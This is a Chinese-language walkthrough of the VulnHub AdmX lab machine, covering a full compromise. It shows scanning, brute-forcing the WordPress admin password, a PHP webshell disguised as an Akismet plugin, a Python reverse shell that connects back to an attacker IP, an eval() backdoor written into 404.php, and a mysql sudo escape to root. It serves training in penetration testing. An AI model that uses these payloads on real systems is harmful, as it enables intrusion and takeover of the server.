第七次打靶

靶机介绍

1）靶机地址：https://download.vulnhub.com/admx/AdmX_new.7z
2）靶机难度：中
3）打靶目标: 取得 2 个 flag + root 权限
4）涉及攻击方法：主机发现、端口扫描、WEB路径爆破、BurpSuite内容替换、密码爆破、MSF漏洞利用、Wordpress后台漏洞利用、升级Full TTY终端、蚁剑上线、利用MySQL提权
5）课程来源：https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0
打靶过程

1）主机发现：通过nmap -sn  ping扫描进行主机发现

1. # nmap -sn 192.168.56.0/24

复制代码

2）端口扫描：对主机进行全端口扫描，发现该主机开放的端口

1. # nmap -p- 192.168.56.111

复制代码

3）对发现的80端口进行服务版本扫描，发现确实是一个apache httpd服务

1. # nmap -p80 -sV 192.168.56.111

复制代码

4）在浏览器直接对页面进行访问：发现只是一个默认的apache起始页面，该页面并没有发现其他更有价值的信息

1. 浏览器：http://192.168.56.111/

复制代码

5）对目标靶机进行web路径发现：本次使用feroxbuster工具（和dirsearch原理一直，但效果不同），默认情况下kali并未安装该工具
①feroxbuster安装

1. # apt install feroxbuster

复制代码

②对目标主机进行路径发现

1. #feroxbuster --url http://192.168.56.111

复制代码

注：默认情况下feroxbuster使用的字典是seclists，如果没有安装seclists字典，需要安装该字典

1. #apt install seclists

复制代码

③除了使用默认的seclists字典外，也可使用其他的字典，如dirb工具下的common.txt字典

1. # feroxbuster --url http://192.168.56.111 -w /usr/share/dirb/wordlists/common.txt

复制代码

通过扫描发现了wordpress目录
6）对如下扫描到的路径进行访问

1. 浏览器：http://192.168.56.111/wordpress/

复制代码

①经过了很长时间，一个页面的内容还没有完整的加载上来，这个页面中到底加载了哪些元素，是哪些元素的加载缓慢，导致了整个页面的加载缓慢，此时通过burp查看整个界面的加载过程

查看到在页面请求过程中，主页面又向服务器请求了192.168.158.145上面的一部分资源，因此时主机和该IP不处于同一个地址段，所以192.168.158.145上的资源无法正常请求，导致页面加载缓慢

7）因192.168.158.145是目标服务端给客户端返回的数据包中硬编码写入的内容，所以在burp上设置：凡是服务端返回的数据包中，如果包含192.168.158.145这个就地址，就强制替换为192.168.56.111
①先修改相应数据包的响应头部分

②再修改相应数据包的相应体部分

③完成之后，重新访问页面，页面加载正常

8）对上述页面进行测试后，未发现任何的漏洞，包括wordpress版本漏洞等。根据前面对网站路径扫描，发现了类似的后台地址，对其进行访问

1. 浏览器：http://192.168.56.111/wordpress/wp-admin/

复制代码

9）对该后台进行密码暴力破解，先通过搜索发现wordpress该CMS的web应用后台管理员账号为admin（面对一个CMS时，先判断是哪种CMS，搜索该CMS有无默认的管理员账号）
①暴力破解时，字典使用提前下载好的mimipwds.txt
字典下载地址：https://github.com/dictest/subdic/tree/ddc8b5dc82750093b6763d9d064bb7d99aa1f425
②破解完成后，发现等使用adam14密码时，页面返回了不同的URL

③通过账号密码正确登陆至系统后台

10）wordpress常见提权方式
①media中如果wordpress版本较低，可以直接在其中上传webshell
②可在Appearance中的Theme Editor的外观主题的PHP源码进行编辑，如可将一句话木马写入外观代码404.php中，如果运气好，可直接使用蚁剑连接。此处该方式失败

③通过查看插件Plugins，或者手动编写并，上传一个插件，
A:编写插件：必须要写插件的头部信息

1. # cat webshell.php
2. <?php
3. /**
4. Plugin Name: Webshell
5. Plugin URI: https://akismet.com/
6. Description: wp webshell for Pentest
7. Version: 1.0
8. Author: Automattic
9. Author URI: https://automattic.com/wordpress-plugins/
10. License: GPLv2 or later
11. Text Domain: akismet
12. */
14. if(isset($_GET['cmd']))
15.     {
16.         system($_GET['cmd']);
17.     }
18. ?>

复制代码

B：将该webshell.php打包成zip压缩包格式

1. # zip shell.zip webshell.php
2. # ls shell.zip

复制代码

C：将shell.zip文件进行上传

D：上传成功后，进行激活引擎

E：访问上传的引擎，执行webshell，执行系统命令，发现正常执行

1. http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=id

复制代码

11）使用上传的webshell进行反弹shell连接
①先确定目标服务器有无nc命令

1. http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=which nc

复制代码

②本次打靶，使用python进行反弹shell,所以先确定目标主机有无python程序

1. http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=which python3

复制代码

③python反弹shell代码

1. python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.103",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

复制代码

1. Kali监听：
2. # nc -lvvp 4444

复制代码

1. 浏览器
2. http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.103",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

复制代码

12）通过MSF获取shell
①启动MSF

1. # msfdb run

复制代码

②查找wordpress后台相关的漏洞利用模块

1. msf6 > search wordpress admin
2. msf6 >use exploit/unix/webapp/wp_admin_shell_upload
3. > set PASSWORD adam14
4. > set RHOSTS 192.168.56.111
5. > set TARGETURI /wordpress
6. > set USERNAME admin
7. > run

复制代码

13）通过python反弹的shell，无法使用vi等命令对文本文件进行编辑，此时需要将shell升级成功能完整的、可以实现交互式的shell(此shell升级只适用于BASH)
①先将kali主机的解释器修改为BASH,先查看当前kali的解释器是否为BASH，若不是需要修改为BASH

1. # echo $SHELL
2. # chsh -s /bin/bash             #修改解释器为BASH
3. # reboot                                             #修改完成后需要重启

复制代码

②将当前shell升级为完整的shell终端

1. CTRL+Z
2. #stty raw -echo
3. #fg
4. #ls
5. #export SHELL=/bin/bash
6. #export TERM=screen
7. #stty rows 38 columns 116
8. #reset

复制代码

14）升级完成后，即可通过vi编辑器，完整的编辑文件（此处向之前添加为成功的404.php中，写入一句话木马）

1. #cd ./wordpress/wp-content/themes/twentytwentyone
2. #vi 404.php
3. eval($_POST['cmd']);

复制代码

15）通过蚁剑连接webshell


注：渗透测试过程中，最好应该获取到目标系统的2-3个shell,防止某些系统触发某个漏洞获取到反弹shell后，环境发送了变化，导致无法使用同一个漏洞进行反弹shell。获取一个shell后，借助该shell获取到其他shell
16）信息搜集：在用户文件中发现了一个可以登录的wpadmin账号，在该用户家目录下，获取到了一个local.txt,但是只有wpadmin用户具备读权限，且查看系统内核版本、sudo权限，均不能进行提权

1. $cat /etc/passwd |grep /bin/bash
2. $cd /home/wpadmin
3. $ls -l local.txt
4. $ uname -a
5. $ sudo -l

复制代码

17）信息搜集：发现了wordpress应用程序的配置文件，通过配置文件查看到了连接数据库的用户名和密码

1. cat /var/www/html/wordpress/wp-config.php

复制代码

18）尝试通过发现的密码，使用wpadmin用户去登录操作系统，发现无法正常登录成功

1. $ su wpadmin

复制代码

19）利用用户名和密码直接进行mysql数据库的登录，发现仍然无法正常登录成功

1. $ mysql -u admin -p Wp_Admin#123 -D wordpress

复制代码

20）通过之前的信息搜集，发现在web界面，有一个adam14的密码，通过该密码对系统用户wpadmin进行登录，发现正确却换到了用户wpadmin，获取到了第一个flag

1. $ su - wpadmin
2. $ ls7
3. $ cat local.txt

复制代码

21）此时信息搜集，发现该用户wpadmin具有sudo权限：不使用密码的情况下即可使用mysql命令

1. $ sudo -l

复制代码

22）通过mysql登录数据库，密码尝试使用adam14时，正确登录至数据库中

1. $ sudo /usr/bin/mysql -u root -D wordpress -p

复制代码

23）通过在mysql数据库中执行system命令（简写/!），获取root权限

1. > system id
2. > \! /bin/bash
3. #cd
4. #cat proof.txt

复制代码

总结：先对目标靶机进行了主机发现和端口扫描，扫描过程中只发现了80端口，通过端口访问到web页面后未发现其他有用漏洞信息，于是对web页面进行了路径发现，发现目标主机上存在一个wordpress的web应用，然后对其进行访问，访问过程中发现页面访问速度特别缓慢，所以开始怀疑是否页面有部分资源请求不到，导致整体的页面加载速度减慢，于是通过burp抓取了整个页面请求过程中的请求信息，于是发现该页面上通过硬编码的方式写死了部分IP地址，于是利用burp的匹配及替换功能，将硬编码写死的IP地址修改为了目标主机IP地址，从而解决页面加载慢的问题，从而可以正常访问到靶机web应用的后台地址，进而利用burp的暴力破解功能，获取到了web后台的密码，正确登入至后台管理界面。在后台管理界面通过了常见的wordpress后台漏洞利用方法（三种），最后使用插件的方式上传了webshell，获取到了反弹的shell，并利用反弹shell进行更新升级，使其成一个具有交互式功能的完整功能shell，利用完整功能的shell，修改了404.php，使得蚁剑可以正常上线。最后通过mysql数据库自身具备的system命令进行了提权（目标靶机上的sudo权限配置不当导致）操作。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！